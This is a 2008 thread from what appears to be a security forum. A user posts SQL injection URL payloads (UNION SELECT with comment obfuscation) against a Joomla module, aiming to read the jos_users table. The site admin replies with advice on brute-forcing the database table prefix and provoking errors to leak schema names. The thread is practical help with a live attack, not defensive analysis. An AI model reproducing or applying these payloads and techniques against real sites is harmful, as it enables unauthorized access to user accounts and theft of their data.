|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 53
Members: 0
Total: 53
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
SQL inj joomla ? |
|
Posted: Sun Mar 16, 2008 8:06 pm |
|
|
kr0k0 |
Advanced user |
|
|
Joined: Jan 26, 2008 |
Posts: 128 |
|
|
|
|
|
|
|
hi waraxe and all membes , i need a help for this exploit SQL injection , i have find this exploit sql injection in a Module , but i have a problem , look plz :
Code: | /index.php?option=com_modules/task=view&id=-1+union/**/select/**/5/* |
5
Code: | /index.php?option=com_modules/task=view&id=-1+union/**/select/**/version()/* |
>Warning error mysql ...
Code: | /index.php?option=com_modules/task=view&id=-1+union/**/select/**/unhex(hex(version()))/* |
4.x.x
Code: | /index.php?option=com_modules/task=view&id=-1+union/**/select/**/unhex(hex(version()))+from+jos_users/* |
>Warning error mysql ...
so ??? |
|
|
|
|
|
|
|
|
Posted: Mon Mar 17, 2008 1:08 am |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
Table "jos_users" does not exist probably. And that because joomla database prefix is different from "jos_". Mysql version is 4.x without information_shema. If error messages does not show mysql internal info, then only choice left is trial-error probing for prefix. I suggest to write special script for this, it's not difficult. And as in case of passwords - if prefix is long enough or in other way hard-to-guess, then you may have unsolvable problem ... but try prefix bruteforce first. Or try to provoke other sql errors in hope for catching sql naming details. |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|